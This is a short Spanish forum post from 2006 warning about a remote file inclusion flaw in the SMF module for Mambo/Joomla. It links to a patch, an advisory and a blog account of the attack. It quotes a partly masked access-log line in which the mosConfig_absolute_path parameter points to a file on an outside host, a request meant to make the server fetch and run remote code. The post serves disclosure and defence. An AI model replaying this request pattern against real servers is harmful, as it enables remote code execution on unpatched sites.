SoloCodigo
Programación Web y Scripting => PHP => Aplicaciones Web Pre-Fabricadas => Mensaje iniciado por: leandrog en Jueves 20 de Julio de 2006, 18:59
-
Vulnerabilidad grave módulo SMF para Mambo - Joomla
Sobre el ataque;
xxxxxx_log
XXX.45.133.X - - [19/Jul/2006:XXXX +0200] “GET /component/option,com_smf/Itemid,63/
components/com_smf/smf.php?mosConfig_absolute_path=
rXXXXXXX.com/components/com_forum/includes/develop? HTTP xxxxxxx “-” “Mozilla/5.0″
Remote File Inclusion
Parche:
http://forum.mamboserver.com/showthread.php?t=83001 (http://forum.mamboserver.com/showthread.php?t=83001)
Más info:
http://www.frsirt.com/english/advisories/2006/2846 (http://www.frsirt.com/english/advisories/2006/2846)
Fuente:
vulneralidad-grave-modulo-smf-para-mambo-joomla (http://www.daboblog.com/2006/07/19/cronica-de-un-ataque-vulnerabilidad-grave-modulo-smf-para-mambo-joomla)